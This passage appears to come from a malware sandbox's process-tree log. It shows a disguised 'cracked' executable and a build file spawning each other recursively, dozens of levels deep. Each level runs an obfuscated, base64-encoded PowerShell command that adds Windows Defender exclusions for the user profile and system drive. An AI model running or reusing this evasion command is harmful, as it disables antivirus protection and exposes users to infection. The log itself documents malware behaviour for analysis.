        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        218⤵
        
        PID:7984
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        218⤵
        
        PID:8024
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        218⤵
        
        PID:8032
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        219⤵
        
        PID:8120
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        219⤵
        
        PID:8176
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        219⤵
        
        PID:6268
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        220⤵
        
        PID:7308
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        220⤵
        
        PID:7040
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        220⤵
        
        PID:7248
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        221⤵
        
        PID:7344
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        221⤵
        
        PID:7504
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        221⤵
        
        PID:7484
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        222⤵
        
        PID:7368
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        222⤵
        
        PID:7696
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        222⤵
        
        PID:7844
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        223⤵
        
        PID:7736
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        223⤵
        
        PID:7980
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        223⤵
        
        PID:7920
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        224⤵
        
        PID:7852
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        224⤵
        
        PID:7692
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        224⤵
        
        PID:8096
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        225⤵
        
        PID:7688
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        225⤵
        
        PID:7576
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        225⤵
        
        PID:7536
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        226⤵
        
        PID:8012
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        226⤵
        
        PID:6836
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        226⤵
        
        PID:7280
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        227⤵
        
        PID:7648
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        227⤵
        
        PID:7412
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        227⤵
        
        PID:7596
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        228⤵
        
        PID:7308
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        228⤵
        
        PID:7640
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        228⤵
        
        PID:7776
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        229⤵
        
        PID:7744
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        229⤵
        
        PID:7856
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        229⤵
        
        PID:7208
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        230⤵
        
        PID:7884
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        230⤵
        
        PID:7644
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        230⤵
        
        PID:7920
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        231⤵
        
        PID:8164
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        231⤵
        
        PID:7120
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        231⤵
        
        PID:7344
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        232⤵
        
        PID:7420
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        232⤵
        
        PID:8140
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        232⤵
        
        PID:8052
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        233⤵
        
        PID:7324
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        233⤵
        
        PID:7208
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        233⤵
        
        PID:7284
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        234⤵
        
        PID:8100
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        234⤵
        
        PID:8184
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        234⤵
        
        PID:7972
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        235⤵
        
        PID:7488
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        235⤵
        
        PID:7760
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        235⤵
        
        PID:8228
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        236⤵
        
        PID:8280
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        236⤵
        
        PID:8304
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        236⤵
        
        PID:8400
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        237⤵
        
        PID:8460
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        237⤵
        
        PID:8488
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        237⤵
        
        PID:8540
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        238⤵
        
        PID:8604
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        238⤵
        
        PID:8624
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        238⤵
        
        PID:8644
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        239⤵
        
        PID:8684
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        239⤵
        
        PID:8724
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        239⤵
        
        PID:8740
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        240⤵
        
        PID:8812
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        240⤵
        
        PID:8860
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        240⤵
        
        PID:8884
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        241⤵
        
        PID:8968
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        241⤵
        
        PID:9004
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        241⤵
        
        PID:9044
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        242⤵
        
        PID:9080
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        242⤵
        
        PID:9120
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        242⤵
        
        PID:9140
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        243⤵
        
        PID:7972
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        243⤵
        
        PID:7128
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        243⤵
        
        PID:8036
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        244⤵
        
        PID:8272
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        244⤵
        
        PID:8208
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        244⤵
        
        PID:8340
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
